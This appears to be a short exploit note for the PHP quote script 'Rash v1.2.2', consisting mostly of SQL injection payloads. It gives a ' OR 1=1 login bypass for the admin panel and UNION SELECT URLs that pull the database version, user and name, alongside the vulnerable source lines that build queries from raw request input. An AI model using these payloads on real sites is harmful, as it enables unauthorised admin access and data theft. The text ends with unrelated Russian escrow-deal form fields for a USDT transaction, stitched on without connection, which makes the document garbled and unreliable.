http://127.0.0.1/rash-v1.2.2/?admin
' OR 1=1/*
case 'adminlogin': include('config.php'); $sql = "SELECT * FROM `" . $rashusers . "` WHERE `user` ='" . $_POST['user'] . "' AND `password` ='" . md5($_POST['password']) . "'"; while($row = mysql_fetch_array(database_connect($sql))){ $section='0'; //setting cookies adminpanel(); // (template)_admin.php in templates folder by default exit(); }
http://127.0.0.1/rash-v1.2.2/?news_edit&id=4'+union+select+1,concat_ws(0x3a,version(),user(),database()),3/*
include('config.php'); $nID = $_GET['id']; $sql = "SELECT * FROM `" . $newstable . "` WHERE `id` = '" . $nID . "'"; news_change($sql); // output.php
' union select database(),version(),user(),4,5,6/*
$quote = $_POST['search']; $sortby = $_POST['sortby']; $number = $_POST['number']; if($sortby == 'rating'){ $how = 'desc'; } if($sortby == 'id'){ $how = 'asc'; } $sql = "SELECT * FROM `" . $quotetable . "` WHERE `quote` LIKE '%" . $quote . "%' ORDER BY `" . $sortby . "` " . $how . " LIMIT " . $number; quote_format($sql, 0); // output.php
Продавец: ник или ID
Название сделки:
Сумма USDT:
Срок сделки, дней:
Кто платит комиссию:
Условия сделки:
После создания сделки средства будут зарезервированы в холде до завершения сделки.